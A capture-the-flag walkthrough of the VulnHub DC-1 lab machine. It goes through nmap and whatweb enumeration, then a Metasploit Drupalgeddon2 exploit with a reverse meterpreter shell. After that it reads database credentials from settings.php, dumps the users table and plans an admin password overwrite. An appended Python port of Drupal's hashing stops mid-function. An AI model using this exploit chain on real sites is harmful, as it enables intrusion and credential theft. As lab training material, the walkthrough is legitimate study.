VulnHub target machine DC-1: walkthrough notes

Determining the IP address

First, check in the VM settings whether the target runs in bridged or NAT mode; that tells you the approximate subnet it lives in.

Next, a host discovery (ping sweep) across that subnet.

Using nmap:

➜  ~ nmap  192.168.18.0/24 -sn
Starting Nmap 7.92 ( https://nmap.org ) at 2021-08-19 16:57 CST
Nmap scan report for bogon (192.168.18.1)
Host is up (0.00044s latency).
Nmap scan report for bogon (192.168.18.3)
Host is up (0.00078s latency).
Nmap scan report for bogon (192.168.18.6)
Host is up (0.000075s latency).
Nmap scan report for bogon (192.168.18.18)
Host is up (0.00028s latency).
Nmap done: 256 IP addresses (4 hosts up) scanned in 2.63 seconds

After checking the attacking machine's own IP, the remaining candidates for the target are 192.168.18.18 and 192.168.18.3.

➜  ~ nmap  192.168.18.18 192.168.18.3
Starting Nmap 7.92 ( https://nmap.org ) at 2021-08-19 16:59 CST
Nmap scan report for bogon (192.168.18.18)
Host is up (0.000068s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT    STATE SERVICE
22/tcp  open  ssh
80/tcp  open  http
111/tcp open  rpcbind

Nmap scan report for bogon (192.168.18.3)
Host is up (0.0046s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT     STATE SERVICE
7000/tcp open  afs3-fileserver
8001/tcp open  vcom-tunnel
8080/tcp open  http-proxy

Nmap done: 2 IP addresses (2 hosts up) scanned in 0.10 seconds

Port-scanning both shows that the target is 192.168.18.18: it exposes SSH (22), HTTP (80) and rpcbind (111), the profile of a Linux web server, whereas 192.168.18.3 only shows 7000/8001/8080.

Information gathering

Detailed enumeration of the target

➜  ~ nmap -T4 -A 192.168.18.18
Starting Nmap 7.92 ( https://nmap.org ) at 2021-08-19 16:59 CST
Nmap scan report for bogon (192.168.18.18)
Host is up (0.00010s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT    STATE SERVICE VERSION
22/tcp  open  ssh     OpenSSH 6.0p1 Debian 4+deb7u7 (protocol 2.0)
| ssh-hostkey:
|   1024 c4:d6:59:e6:77:4c:22:7a:96:16:60:67:8b:42:48:8f (DSA)
|   2048 11:82:fe:53:4e:dc:5b:32:7f:44:64:82:75:7d:d0:a0 (RSA)
|_  256 3d:aa:98:5c:87:af:ea:84:b8:23:68:8d:b9:05:5f:d8 (ECDSA)
80/tcp  open  http    Apache httpd 2.2.22 ((Debian))
|_http-title: Welcome to Drupal Site | Drupal Site
| http-robots.txt: 36 disallowed entries (15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt
|_/LICENSE.txt /MAINTAINERS.txt
|_http-generator: Drupal 7 (http://drupal.org)
|_http-server-header: Apache/2.2.22 (Debian)
111/tcp open  rpcbind 2-4 (RPC #100000)
| rpcinfo:
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100024  1          40837/udp6  status
|   100024  1          50483/udp   status
|   100024  1          57505/tcp   status
|_  100024  1          60461/tcp6  status
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.48 seconds

From this scan: port 22 runs OpenSSH 6.0p1, port 80 runs Apache httpd 2.2.22 on Debian, and the http-generator and http-title lines show the site is Drupal 7. The deb7 package suffixes mean an old Debian 7 (wheezy) stack, so Drupal itself is the obvious attack surface.

Checking the site's CMS

Browse to http://192.168.18.18

From the site itself and the previous step, this site is built on Drupal.

Getting detailed CMS information with whatweb:

~ whatweb -v 192.168.18.18
WhatWeb report for http://192.168.18.18
Status    : 200 OK
Title     : Welcome to Drupal Site | Drupal Site
IP        : 192.168.18.18
Country   : RESERVED, ZZ

Summary   : Apache[2.2.22], Content-Language[en], Drupal, HTTPServer[Debian Linux][Apache/2.2.22 (Debian)], JQuery, MetaGenerator[Drupal 7 (http://drupal.org)], PasswordField[pass], PHP[5.4.45-0+deb7u14], Script[text/javascript], UncommonHeaders[x-generator], X-Powered-By[PHP/5.4.45-0+deb7u14]

Detected Plugins:
[ Apache ]
        The Apache HTTP Server Project is an effort to develop and maintain an open-source HTTP server for modern operating systems including UNIX and Windows NT. The goal of this project is to provide a secure, efficient and extensible server that provides HTTP services in sync with the current HTTP standards.
        Version      : 2.2.22 (from HTTP Server Header)
        Google Dorks: (3)
        Website     : http://httpd.apache.org/

[ Content-Language ]
        Detect the content-language setting from the HTTP header.
        String       : en

[ Drupal ]
        Drupal is an opensource CMS written in PHP. Aggressive function available (check plugin file or details).
        Google Dorks: (1)
        Website     : http://www.drupal.org

[ HTTPServer ]
        HTTP server header string. This plugin also attempts to identify the operating system from the server header.
        OS           : Debian Linux
        String       : Apache/2.2.22 (Debian) (from server string)

[ JQuery ]
        A fast, concise, JavaScript that simplifies how to traverse HTML documents, handle events, perform animations, and add AJAX.
        Website     : http://jquery.com/

[ MetaGenerator ]
        This plugin identifies meta generator tags and extracts its value.
        String       : Drupal 7 (http://drupal.org)

[ PHP ]
        PHP is a widely-used general-purpose scripting language that is especially suited for Web development and can be embedded into HTML. This plugin identifies PHP errors, modules and versions and extracts the local file path and username if present.
        Version      : 5.4.45-0+deb7u14
        Google Dorks: (3)
        Website     : http://www.php.net/

[ PasswordField ]
        find password fields
        String       : pass (from field name)

[ Script ]
        This plugin detects instances of script HTML elements and returns the script language/type.
        String       : text/javascript

[ UncommonHeaders ]
        Uncommon HTTP server headers. The blacklist includes all the standard headers and many non standard but common ones. Interesting but fairly common headers should have their own plugins, eg. x-powered-by, server and x-aspnet-version. Info about headers can be found at www.http-stats.com
        String       : x-generator (from headers)

[ X-Powered-By ]
        X-Powered-By HTTP header
        String       : PHP/5.4.45-0+deb7u14 (from x-powered-by string)

HTTP Headers:
        HTTP/1.1 200 OK
        Date: Thu, 19 Aug 2021 08:53:33 GMT
        Server: Apache/2.2.22 (Debian)
        X-Powered-By: PHP/5.4.45-0+deb7u14
        Expires: Sun, 19 Nov 1978 05:00:00 GMT
        Last-Modified: Thu, 19 Aug 2021 08:53:33 +0000
        Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
        ETag: "1629363213"
        Content-Language: en
        X-Generator: Drupal 7 (http://drupal.org)
        Vary: Accept-Encoding
        Content-Encoding: gzip
        Content-Length: 2273
        Connection: close
        Content-Type: text/html; charset=utf-8

So the CMS is Drupal 7, on PHP 5.4.45.

The three big overseas CMSes:

  • drupal
  • wordpress
  • joomla

I'm following the solution most writeups online use (don't ask why I'm not doing it some other way: first, I'm a noob, and second, riding an existing wheel is pretty comfortable).

Starting the attack

Establishing a connection (reverse TCP shell)

Use msfconsole to exploit the target and get a shell:

➜  ~ msfconsole

       =[ metasploit v6.0.53-dev                          ]
+ -- --=[ 2149 exploits - 1143 auxiliary - 366 post       ]
+ -- --=[ 592 payloads - 45 encoders - 10 nops            ]
+ -- --=[ 8 evasion                                       ]

Metasploit tip: Adapter names can be used for IP params
set LHOST eth0

msf6 > search drupal       // search for Drupal-related modules

Matching Modules
================

   #  Name                                           Disclosure Date  Rank       Check  Description
   -  ----                                           ---------------  ----       -----  -----------
   0  exploit/unix/webapp/drupal_coder_exec          2016-07-13       excellent  Yes    Drupal CODER Module Remote Command Execution
   1  exploit/unix/webapp/drupal_drupalgeddon2       2018-03-28       excellent  Yes    Drupal Drupalgeddon 2 Forms API Property Injection
   2  exploit/multi/http/drupal_drupageddon          2014-10-15       excellent  No     Drupal HTTP Parameter Key/Value SQL Injection
   3  auxiliary/gather/drupal_openid_xxe             2012-10-17       normal     Yes    Drupal OpenID External Entity Injection
   4  exploit/unix/webapp/drupal_restws_exec         2016-07-13       excellent  Yes    Drupal RESTWS Module Remote PHP Code Execution
   5  exploit/unix/webapp/drupal_restws_unserialize  2019-02-20       normal     Yes    Drupal RESTful Web Services unserialize() RCE
   6  auxiliary/scanner/http/drupal_views_user_enum  2010-07-02       normal     Yes    Drupal Views Module Users Enumeration
   7  exploit/unix/webapp/php_xmlrpc_eval            2005-06-29       excellent  Yes    PHP XML-RPC Arbitrary Code Execution

Interact with a module by name or index. For example info 7, use 7 or use exploit/unix/webapp/php_xmlrpc_eval

msf6 > use 1      // use module 1, the Drupalgeddon 2 exploit (index 0 is the CODER module)
[*] No payload configured, defaulting to php/meterpreter/reverse_tcp
msf6 exploit(unix/webapp/drupal_drupalgeddon2) > set payload php/meterpreter/reverse_tcp     // reverse TCP shell payload
payload => php/meterpreter/reverse_tcp
msf6 exploit(unix/webapp/drupal_drupalgeddon2) > show options        // list the options that need setting

Module options (exploit/unix/webapp/drupal_drupalgeddon2):

   Name         Current Setting  Required  Description
   ----         ---------------  --------  -----------
   DUMP_OUTPUT  false            no        Dump payload command output
   PHP_FUNC     passthru         yes       PHP function to execute
   Proxies                       no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                        yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT        80               yes       The target port (TCP)
   SSL          false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI    /                yes       Path to Drupal install
   VHOST                         no        HTTP server virtual host

Payload options (php/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.18.6     yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Automatic (PHP In-Memory)

msf6 exploit(unix/webapp/drupal_drupalgeddon2) > set rhosts 192.168.18.18
rhosts => 192.168.18.18      // set the target IP
msf6 exploit(unix/webapp/drupal_drupalgeddon2) > exploit     // launch the attack

[*] Started reverse TCP handler on 192.168.18.6:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[!] The service is running, but could not be validated.
[*] Sending stage (39282 bytes) to 192.168.18.18
[*] Meterpreter session 1 opened (192.168.18.6:4444 -> 192.168.18.18:33672) at 2021-08-19 19:17:00 +0800

meterpreter > pwd     // exploit succeeded; check the current directory
/var/www
meterpreter > ls
Listing: /var/www
=================

Mode              Size   Type  Last modified              Name
----              ----   ----  -------------              ----
100644/rw-r--r--  174    fil   2013-11-21 04:45:59 +0800  .gitignore
100644/rw-r--r--  5767   fil   2013-11-21 04:45:59 +0800  .htaccess
100644/rw-r--r--  1481   fil   2013-11-21 04:45:59 +0800  COPYRIGHT.txt
100644/rw-r--r--  1451   fil   2013-11-21 04:45:59 +0800  INSTALL.mysql.txt
100644/rw-r--r--  1874   fil   2013-11-21 04:45:59 +0800  INSTALL.pgsql.txt
100644/rw-r--r--  1298   fil   2013-11-21 04:45:59 +0800  INSTALL.sqlite.txt
100644/rw-r--r--  17861  fil   2013-11-21 04:45:59 +0800  INSTALL.txt
100755/rwxr-xr-x  18092  fil   2013-11-01 18:14:15 +0800  LICENSE.txt
100644/rw-r--r--  8191   fil   2013-11-21 04:45:59 +0800  MAINTAINERS.txt
100644/rw-r--r--  5376   fil   2013-11-21 04:45:59 +0800  README.txt
100644/rw-r--r--  9642   fil   2013-11-21 04:45:59 +0800  UPGRADE.txt
100644/rw-r--r--  6604   fil   2013-11-21 04:45:59 +0800  authorize.php
100644/rw-r--r--  720    fil   2013-11-21 04:45:59 +0800  cron.php
100644/rw-r--r--  52     fil   2019-02-19 21:20:46 +0800  flag1.txt
40755/rwxr-xr-x   4096   dir   2013-11-21 04:45:59 +0800  includes
100644/rw-r--r--  529    fil   2013-11-21 04:45:59 +0800  index.php
100644/rw-r--r--  703    fil   2013-11-21 04:45:59 +0800  install.php
40755/rwxr-xr-x   4096   dir   2013-11-21 04:45:59 +0800  misc
40755/rwxr-xr-x   4096   dir   2013-11-21 04:45:59 +0800  modules
40755/rwxr-xr-x   4096   dir   2013-11-21 04:45:59 +0800  profiles
100644/rw-r--r--  1561   fil   2013-11-21 04:45:59 +0800  robots.txt
40755/rwxr-xr-x   4096   dir   2013-11-21 04:45:59 +0800  scripts
40755/rwxr-xr-x   4096   dir   2013-11-21 04:45:59 +0800  sites
40755/rwxr-xr-x   4096   dir   2013-11-21 04:45:59 +0800  themes
100644/rw-r--r--  19941  fil   2013-11-21 04:45:59 +0800  update.php
100644/rw-r--r--  2178   fil   2013-11-21 04:45:59 +0800  web.config
100644/rw-r--r--  417    fil   2013-11-21 04:45:59 +0800  xmlrpc.php

meterpreter > cat flag1.txt     // read flag1
Every good CMS needs a config file - and so do you.

The hint points at the CMS config file. Drupal 7 keeps its site settings under sites/default, so the path is easy to find with a quick search.

The path is /var/www/sites/default/settings.php

Reading it gives flag2 (along with the database credentials):

<?php

/**
 *
 * flag2
 * Brute force and dictionary attacks aren't the
 * only ways to gain access (and you WILL need access).
 * What can you do with these credentials?
 *
 */

$databases = array (
  'default' =>
  array (
    'default' =>
    array (
      'database' => 'drupaldb',
      'username' => 'dbuser',
      'password' => 'R0ck3t',
      'host' => 'localhost',
      'port' => '',
      'driver' => 'mysql',
      'prefix' => '',
    ),
  ),
);

/**
 * Access control for update.php script.
 *
 * If you are updating your Drupal installation using the update.php script but
 * are not logged in using either an account with the "Administer software
 * updates" permission or the site maintenance account (the account that was
 * created during installation), you will need to modify the access check
 * statement below. Change the FALSE to a TRUE to disable the access check.
 * After finishing the upgrade, be sure to open this file again and change the
 * TRUE back to a FALSE!
 */
$update_free_access = FALSE;

/**
 * Salt for one-time login links and cancel links, form tokens, etc.
 *
 * This variable will be set to a random value by the installer. All one-time
 * login links will be invalidated if the value is changed. Note that if your
 * site is deployed on a cluster of web servers, you must ensure that this
 * variable has the same value on each server. If this variable is empty, a hash
 * of the serialized database credentials will be used as a fallback salt.
 *
 * For enhanced security, you may set this variable to a value using the
 * contents of a file outside your docroot that is never saved together
 * with any backups of your Drupal files and database.
 *
 * Example:
 *   $drupal_hash_salt = file_get_contents('/home/example/salt.txt');
 *
 */
$drupal_hash_salt = 'X8gdX7OdYRiBnlHoj0ukhtZ7eO4EDrvMkhN21SWZocs';

/**
 * Base URL (optional).
 *
 * If Drupal is generating incorrect URLs on your site, which could
 * be in HTML headers (links to CSS and JS files) or visible links on pages
 * (such as in menus), uncomment the Base URL statement below (remove the
 * leading hash sign) and fill in the absolute URL to your Drupal installation.
 *
 * You might also want to force users to use a given domain.
 * See the .htaccess file for more information.
 *
 * Examples:
 *   $base_url = 'http://www.example.com';
 *   $base_url = 'http://www.example.com:8888';
 *   $base_url = 'http://www.example.com/drupal';
 *   $base_url = 'https://www.example.com:8888/drupal';
 *
 * It is not allowed to have a trailing slash; Drupal will add it
 * for you.
 */
# $base_url = 'http://www.example.com';  // NO trailing slash!

/**
 * PHP settings:
 *
 * To see what PHP settings are possible, including whether they can be set at
 * runtime (by using ini_set()), read the PHP documentation:
 * http://www.php.net/manual/en/ini.list.php
 * See drupal_environment_initialize() in includes/bootstrap.inc for required
 * runtime settings and the .htaccess file for non-runtime settings. Settings
 * defined there should not be duplicated here so as to avoid conflict issues.
 */

/**
 * Some distributions of Linux (most notably Debian) ship their PHP
 * installations with garbage collection (gc) disabled. Since Drupal depends on
 * PHP's garbage collection for clearing sessions, ensure that garbage
 * collection occurs by using the most common settings.
 */
ini_set('session.gc_probability', 1);
ini_set('session.gc_divisor', 100);

/**
 * Set session lifetime (in seconds), i.e. the time from the user's last visit
 * to the active session may be deleted by the session garbage collector. When
 * a session is deleted, authenticated users are logged out, and the contents
 * of the user's $_SESSION variable is discarded.
 */
ini_set('session.gc_maxlifetime', 200000);

/**
 * Set session cookie lifetime (in seconds), i.e. the time from the session is
 * created to the cookie expires, i.e. when the browser is expected to discard
 * the cookie. The value 0 means "until the browser is closed".
 */
ini_set('session.cookie_lifetime', 2000000);

/**
 * If you encounter a situation where users post a large amount of text, and
 * the result is stripped out upon viewing but can still be edited, Drupal's
 * output filter may not have sufficient memory to process it.  If you
 * experience this issue, you may wish to uncomment the following two lines
 * and increase the limits of these variables.  For more information, see
 * http://php.net/manual/en/pcre.configuration.php.
 */
# ini_set('pcre.backtrack_limit', 200000);
# ini_set('pcre.recursion_limit', 200000);

/**
 * Drupal automatically generates a unique session cookie name for each site
 * based on its full domain name. If you have multiple domains pointing at the
 * same Drupal site, you can either redirect them all to a single domain (see
 * comment in .htaccess), or uncomment the line below and specify their shared
 * base domain. Doing so assures that users remain logged in as they cross
 * between your various domains. Make sure to always start the $cookie_domain
 * with a leading dot, as per RFC 2109.
 */
# $cookie_domain = '.example.com';

/**
 * Variable overrides:
 *
 * To override specific entries in the 'variable' table for this site,
 * set them here. You usually don't need to use this feature. This is
 * useful in a configuration file for a vhost or directory, rather than
 * the default settings.php. Any configuration setting from the 'variable'
 * table can be given a new value. Note that any values you provide in
 * these variable overrides will not be modifiable from the Drupal
 * administration interface.
 *
 * The following overrides are examples:
 * - site_name: Defines the site's name.
 * - theme_default: Defines the default theme for this site.
 * - anonymous: Defines the human-readable name of anonymous users.
 * Remove the leading hash signs to enable.
 */
# $conf['site_name'] = 'My Drupal site';
# $conf['theme_default'] = 'garland';
# $conf['anonymous'] = 'Visitor';

/**
 * A custom theme can be set for the offline page. This applies when the site
 * is explicitly set to maintenance mode through the administration page or when
 * the database is inactive due to an error. It can be set through the
 * 'maintenance_theme' key. The template file should also be copied into the
 * theme. It is located inside 'modules/system/maintenance-page.tpl.php'.
 * Note: This setting does not apply to installation and update pages.
 */
# $conf['maintenance_theme'] = 'bartik';

/**
 * Reverse Proxy Configuration:
 *
 * Reverse proxy servers are often used to enhance the performance
 * of heavily visited sites and may also provide other site caching,
 * security, or encryption benefits. In an environment where Drupal
 * is behind a reverse proxy, the real IP address of the client should
 * be determined such that the correct client IP address is available
 * to Drupal's logging, statistics, and access management systems. In
 * the most simple scenario, the proxy server will add an
 * X-Forwarded-For header to the request that contains the client IP
 * address. However, HTTP headers are vulnerable to spoofing, where a
 * malicious client could bypass restrictions by setting the
 * X-Forwarded-For header directly. Therefore, Drupal's proxy
 * configuration requires the IP addresses of all remote proxies to be
 * specified in $conf['reverse_proxy_addresses'] to work correctly.
 *
 * Enable this setting to get Drupal to determine the client IP from
 * the X-Forwarded-For header (or $conf['reverse_proxy_header'] if set).
 * If you are unsure about this setting, do not have a reverse proxy,
 * or Drupal operates in a shared hosting environment, this setting
 * should remain commented out.
 *
 * In order for this setting to be used you must specify every possible
 * reverse proxy IP address in $conf['reverse_proxy_addresses'].
 * If a complete list of reverse proxies is not available in your
 * environment (for example, if you use a CDN) you may set the
 * $_SERVER['REMOTE_ADDR'] variable directly in settings.php.
 * Be aware, however, that it is likely that this would allow IP
 * address spoofing unless more advanced precautions are taken.
 */
# $conf['reverse_proxy'] = TRUE;

/**
 * Specify every reverse proxy IP address in your environment.
 * This setting is required if $conf['reverse_proxy'] is TRUE.
 */
# $conf['reverse_proxy_addresses'] = array('a.b.c.d', ...);

/**
 * Set this value if your proxy server sends the client IP in a header
 * other than X-Forwarded-For.
 */
# $conf['reverse_proxy_header'] = 'HTTP_X_CLUSTER_CLIENT_IP';

/**
 * Page caching:
 *
 * By default, Drupal sends a "Vary: Cookie" HTTP header for anonymous page
 * views. This tells a HTTP proxy that it may return a page from its local
 * cache without contacting the web server, if the user sends the same Cookie
 * header as the user who originally requested the cached page. Without "Vary:
 * Cookie", authenticated users would also be served the anonymous page from
 * the cache. If the site has mostly anonymous users except a few known
 * editors/administrators, the Vary header can be omitted. This allows for
 * better caching in HTTP proxies (including reverse proxies), i.e. even if
 * clients send different cookies, they still get content served from the cache.
 * However, authenticated users should access the site directly (i.e. not use an
 * HTTP proxy, and bypass the reverse proxy if one is used) in order to avoid
 * getting cached pages from the proxy.
 */
# $conf['omit_vary_cookie'] = TRUE;

/**
 * CSS/JS aggregated file gzip compression:
 *
 * By default, when CSS or JS aggregation and clean URLs are enabled Drupal will
 * store a gzip compressed (.gz) copy of the aggregated files. If this file is
 * available then rewrite rules in the default .htaccess file will serve these
 * files to browsers that accept gzip encoded content. This allows pages to load
 * faster for these users and has minimal impact on server load. If you are
 * using a webserver other than Apache httpd, or a caching reverse proxy that is
 * configured to cache and compress these files itself you may want to uncomment
 * one or both of the below lines, which will prevent gzip files being stored.
 */
# $conf['css_gzip_compression'] = FALSE;
# $conf['js_gzip_compression'] = FALSE;

/**
 * String overrides:
 *
 * To override specific strings on your site with or without enabling the Locale
 * module, add an entry to this list. This functionality allows you to change
 * a small number of your site's default English language interface strings.
 *
 * Remove the leading hash signs to enable.
 */
# $conf['locale_custom_strings_en'][''] = array(
#   'forum'      => 'Discussion board',
#   '@count min' => '@count minutes',
# );

/**
 *
 * IP blocking:
 *
 * To bypass database queries for denied IP addresses, use this setting.
 * Drupal queries the {blocked_ips} table by default on every page request
 * for both authenticated and anonymous users. This allows the system to
 * block IP addresses from within the administrative interface and before any
 * modules are loaded. However on high traffic websites you may want to avoid
 * this query, allowing you to bypass database access altogether for anonymous
 * users under certain caching configurations.
 *
 * If using this setting, you will need to add back any IP addresses which
 * you may have blocked via the administrative interface. Each element of this
 * array represents a blocked IP address. Uncommenting the array and leaving it
 * empty will have the effect of disabling IP blocking on your site.
 *
 * Remove the leading hash signs to enable.
 */
# $conf['blocked_ips'] = array(
#   'a.b.c.d',
# );

/**
 * Fast 404 pages:
 *
 * Drupal can generate fully themed 404 pages. However, some of these responses
 * are for images or other resource files that are not displayed to the user.
 * This can waste bandwidth, and also generate server load.
 *
 * The options below return a simple, fast 404 page for URLs matching a
 * specific pattern:
 * - 404_fast_paths_exclude: A regular expression to match paths to exclude,
 *   such as images generated by image styles, or dynamically-resized images.
 *   If you need to add more paths, you can add '|path' to the expression.
 * - 404_fast_paths: A regular expression to match paths that should return a
 *   simple 404 page, rather than the fully themed 404 page. If you don't have
 *   any aliases ending in htm or html you can add '|s?html?' to the expression.
 * - 404_fast_html: The html to return for simple 404 pages.
 *
 * Add leading hash signs if you would like to disable this functionality.
 */
$conf['404_fast_paths_exclude'] = '/\/(?:styles)\//';
$conf['404_fast_paths'] = '/\.(?:txt|png|gif|jpe?g|css|js|ico|swf|flv|cgi|bat|pl|dll|exe|asp)$/i';
$conf['404_fast_html'] = '<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL "@path" was not found on this server.</p></body></html>';

/**
 * By default the page request process will return a fast 404 page for missing
 * files if they match the regular expression set in '404_fast_paths' and not
 * '404_fast_paths_exclude' above. 404 errors will simultaneously be logged in
 * the Drupal system log.
 *
 * You can choose to return a fast 404 page earlier for missing pages (as soon
 * as settings.php is loaded) by uncommenting the line below. This speeds up
 * server response time when loading 404 error pages and prevents the 404 error
 * from being logged in the Drupal system log. In order to prevent valid pages
 * such as image styles and other generated content that may match the
 * '404_fast_html' regular expression from returning 404 errors, it is necessary
 * to add them to the '404_fast_paths_exclude' regular expression above. Make
 * sure that you understand the effects of this feature before uncommenting the
 * line below.
 */
# drupal_fast_404();

/**
 * External access proxy settings:
 *
 * If your site must access the Internet via a web proxy then you can enter
 * the proxy settings here. Currently only basic authentication is supported
 * by using the username and password variables. The proxy_user_agent variable
 * can be set to NULL for proxies that require no User-Agent header or to a
 * non-empty string for proxies that limit requests to a specific agent. The
 * proxy_exceptions variable is an array of host names to be accessed directly,
 * not via proxy.
 */
# $conf['proxy_server'] = '';
# $conf['proxy_port'] = 8080;
# $conf['proxy_username'] = '';
# $conf['proxy_password'] = '';
# $conf['proxy_user_agent'] = '';
# $conf['proxy_exceptions'] = array('127.0.0.1', 'localhost');

/**
 * Authorized file system operations:
 *
 * The Update manager module included with Drupal provides a mechanism for
 * site administrators to securely install missing updates for the site
 * directly through the web user interface. On securely-configured servers,
 * the Update manager will require the administrator to provide SSH or FTP
 * credentials before allowing the installation to proceed; this allows the
 * site to update the new files as the user who owns all the Drupal files,
 * instead of as the user the webserver is running as. On servers where the
 * webserver user is itself the owner of the Drupal files, the administrator
 * will not be prompted for SSH or FTP credentials (note that these server
 * setups are common on shared hosting, but are inherently insecure).
 *
 * Some sites might wish to disable the above functionality, and only update
 * the code directly via SSH or FTP themselves. This setting completely
 * disables all functionality related to these authorized file operations.
 *
 * @see http://drupal.org/node/244924
 *
 * Remove the leading hash signs to disable.
 */
# $conf['allow_authorize_operations'] = FALSE;

That gives the MySQL credentials (dbuser / R0ck3t). Drop to a shell, upgrade it to a proper TTY, and log into the database:

meterpreter > shell
Process 3396 created.
Channel 3029 created.
python -c 'import pty; pty.spawn("/bin/bash")'
www-data@DC-1:/var/www$ mysql -udbuser -p
Enter password: R0ck3t
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 83
Server version: 5.5.60-0+deb7u1 (Debian)

Copyright (c) 2000, 2018, Oracle and/or its affiliates. All rights reserved.

Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql> show databases;
show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| drupaldb           |
+--------------------+
2 rows in set (0.00 sec)

mysql> use drupaldb
use drupaldb
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
mysql> show tables;
show tables;
+-----------------------------+
| Tables_in_drupaldb          |
+-----------------------------+
| actions                     |
| authmap                     |
| batch                       |
| block                       |
| block_custom                |
| block_node_type             |
| block_role                  |
| blocked_ips                 |
| cache                       |
| cache_block                 |
| cache_bootstrap             |
| cache_field                 |
| cache_filter                |
| cache_form                  |
| cache_image                 |
| cache_menu                  |
| cache_page                  |
| cache_path                  |
| cache_update                |
| cache_views                 |
| cache_views_data            |
| comment                     |
| ctools_css_cache            |
| ctools_object_cache         |
| date_format_locale          |
| date_format_type            |
| date_formats                |
| field_config                |
| field_config_instance       |
| field_data_body             |
| field_data_comment_body     |
| field_data_field_image      |
| field_data_field_tags       |
| field_revision_body         |
| field_revision_comment_body |
| field_revision_field_image  |
| field_revision_field_tags   |
| file_managed                |
| file_usage                  |
| filter                      |
| filter_format               |
| flood                       |
| history                     |
| image_effects               |
| image_styles                |
| menu_custom                 |
| menu_links                  |
| menu_router                 |
| node                        |
| node_access                 |
| node_comment_statistics     |
| node_revision               |
| node_type                   |
| queue                       |
| rdf_mapping                 |
| registry                    |
| registry_file               |
| role                        |
| role_permission             |
| search_dataset              |
| search_index                |
| search_node_links           |
| search_total                |
| semaphore                   |
| sequences                   |
| sessions                    |
| shortcut_set                |
| shortcut_set_users          |
| system                      |
| taxonomy_index              |
| taxonomy_term_data          |
| taxonomy_term_hierarchy     |
| taxonomy_vocabulary         |
| url_alias                   |
| users                       |
| users_roles                 |
| variable                    |
| views_display               |
| views_view                  |
| watchdog                    |
+-----------------------------+
80 rows in set (0.00 sec)
select * from users;
+-----+-------+---------------------------------------------------------+-------------------+-------+-----------+------------------+------------+------------+------------+--------+---------------------+----------+---------+-------------------+------+
| uid | name  | pass                                                    | mail              | theme | signature | signature_format | created    | access     | login      | status | timezone            | language | picture | init              | data |
+-----+-------+---------------------------------------------------------+-------------------+-------+-----------+------------------+------------+------------+------------+--------+---------------------+----------+---------+-------------------+------+
|   0 |       |                                                         |                   |       |           | NULL             |          0 |          0 |          0 |      0 | NULL                |          |       0 |                   | NULL |
|   1 | admin | $S$DvQI6Y600iNeXRIeEMF94Y6FvN8nujJcEDTCP9nS5.i38jnEKuDR | admin@example.com |       |           | NULL             | 1550581826 | 1550583852 | 1550582362 |      1 | Australia/Melbourne |          |       0 | admin@example.com | b:0; |
|   2 | Fred  | $S$DWGrxef6.D0cwB5Ts.GlnLw15chRRWH2s1R3QBwC0EkvBQ/9TCGg | fred@example.org  |       |           | filtered_html    | 1550581952 | 1550582225 | 1550582225 |      1 | Australia/Melbourne |          |       0 | fred@example.org  | b:0; |
|   3 | user  | $S$D40atfVwB3DZUjxI71G.RcnVqZ6C/zY2YoBuvMYETAMDhWxo1KRX |                   |       |           | NULL             |          0 | 1629359199 | 1629359199 |      1 | NULL                |          |       0 |                   | b:0; |
+-----+-------+---------------------------------------------------------+-------------------+-------+-----------+------------------+------------+------------+------------+--------+---------------------+----------+---------+-------------------+------+
4 rows in set (0.00 sec)

The idea here is to change admin's password: generate a new hash with a script and then overwrite the original password with an SQL statement (this should be done with the password script in Drupal's scripts directory to produce the new hash, followed by an UPDATE that overwrites the old value).
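The `$S$` strings in the `pass` column above are Drupal 7's salted, stretched SHA-512 hashes, and `scripts/password-hash.sh` simply calls `user_hash_password()` to produce one. As an added example (not code from this write-up or from Drupal itself), here is a Python port of that routine and of `user_check_password()`, which lets you confirm whether a hash pulled from a database matches a known or weak password and read how many rounds it was stretched with; the sample passwords are constructed.

```python
# Added example: a Python port of Drupal 7's '$S$' password hashing
# (includes/password.inc), not code from the write-up or from Drupal itself.
# Only the sha512 '$S$' form seen in users.pass is handled, not '$P$'/'U$'.
import hashlib, math, os

ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"
HASH_LENGTH, MIN_LOG2, MAX_LOG2 = 55, 7, 30   # Drupal 7 password.inc constants

def b64_encode(data: bytes) -> str:
    """phpass-style base64: 6 bits at a time, low bits first, no padding."""
    out, i, n = [], 0, len(data)
    while i < n:
        value = data[i]; i += 1
        out.append(ITOA64[value & 0x3F])
        if i < n: value |= data[i] << 8
        out.append(ITOA64[(value >> 6) & 0x3F])
        if i >= n: break
        i += 1
        if i < n: value |= data[i] << 16
        out.append(ITOA64[(value >> 12) & 0x3F])
        if i >= n: break
        i += 1
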